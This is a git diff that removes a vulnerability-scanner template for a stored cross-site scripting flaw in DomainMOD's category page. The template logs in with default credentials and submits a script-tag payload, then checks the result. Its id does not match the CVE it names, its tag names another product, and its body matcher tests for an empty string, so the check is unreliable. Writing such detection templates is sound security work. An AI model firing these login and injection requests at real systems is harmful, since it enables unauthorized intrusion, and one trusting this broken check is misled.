diff --git a/cves/2018/CVE-2018-20011.yaml b/cves/2018/CVE-2018-20011.yaml deleted file mode 100644 index be87afef4a..0000000000 --- a/cves/2018/CVE-2018-20011.yaml +++ /dev/null @@ -1,66 +0,0 @@ -id: CVE-2018-200011 - -info: - name: DomainMOD 4.11.01 - '/assets/add/category.php' Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/category.php CatagoryName, StakeHolder parameters. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-20011 - - https://www.exploit-db.com/exploits/46374/ - - metadata: - verified: true - tags: wbcecms,xss - -requests: - - raw: - - # - | - # GET /domain/ HTTP/1.1 - # Host: {{Hostname}} - # Content-Type: application/x-www-form-urlencoded - - - | - POST /domain/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username=admin&new_password=admin123 - - - | - POST /domain/assets/add/category.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Origin: https://{{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - - new_category=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_stakeholder=&new_notes= - - - | - GET /domain/assets/categories.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - cookie-reuse: true - matchers-condition: and - redirects: true - max-redirects: 3 - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 \ No newline at end of file